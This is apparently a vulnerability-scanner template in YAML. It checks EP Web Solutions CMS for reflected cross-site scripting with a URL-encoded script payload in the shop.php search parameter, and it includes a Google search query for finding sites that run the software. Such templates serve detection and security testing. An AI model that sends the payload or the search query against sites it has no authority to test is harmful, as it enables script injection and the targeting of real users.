id: ep-web-cms-xss

info:
  name: EP Web Solutions CMS - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Cross-site scripting is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website.
  reference:
    - https://www.exploitalert.com/view-details.html?id=36197
    - https://cxsecurity.com/ascii/WLB-2020090139
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"EPweb " || intext:" Evergreen Park Web"
  tags: xss,epweb,unauth,cms

http:
  - method: GET
    path:
      - "{{BaseURL}}/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "/><script>alert(document.domain)</script>") && contains(body, "EPweb")'
        condition: and

# digest: 4a0a00473045022100e9d5d1434144e924724959a650cf160be303c3e1c758cc361a1aa472c147c2f2022027d0d6beb43e83c8257ebfefe21c5802cad4a0fc6ae59a6841007c5f7a090ceb:922c64590222798bb761d5b6d8e72950
